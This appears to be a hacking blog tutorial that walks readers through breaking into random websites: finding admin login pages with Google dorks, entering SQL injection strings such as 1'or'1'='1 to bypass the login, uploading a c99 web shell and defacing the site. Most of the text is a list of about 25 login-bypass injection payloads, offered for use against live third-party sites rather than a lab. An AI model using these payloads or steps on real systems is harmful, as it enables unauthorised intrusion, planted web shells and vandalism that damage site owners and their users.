A Basic SQL injection; How hackers deface by using it
I have been giving tutorials on the hacking of websites through various techniques like LFI, RFI, SQLi etc. SQL injection can be done by using various tools like Acunetix, SQL helper, Havij etc. In my past tutorial I showed you how Havij is used by hackers to scan a website for vulnerabilities and then take advantage of the loophole to gain access to the website. There are various methods of this technique, and in this tutorial I will be describing a very basic and simple Structured Query Language injection (SQLi). Apart from this, let me also tell you that the SQL injection technique is widely used by hackers. I am of the perception that if 100 sites are hacked, 70 will be due to SQL injection. In this tutorial we will come to know how to find a website's admin panel using a simple Google dork, and a SQL query to bypass the admin user name and password and enter the panel. When we enter the admin panel, what we have to do is find a file upload option, upload a shell there such as the c99 shell, and finally deface the site.
Click Here to Download DORKS
By entering these dorks, many sites will open up having /adminlogin.aspx in their URL.
Select any website and you will get the admin panel of that website.
Fill the details as:
User: 1'or'1'='1
Password: 1'or'1'='1
Using the above-mentioned login details, you will enter the admin panel of the website. It will not work for all websites, but this is what is called a basic SQL injection.
Other Injection Queries are like this:
' or 1=1 --
1'or'1'='1
admin'--
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"=")
Hatha khaana, Odeeha ha chee lukhmuuth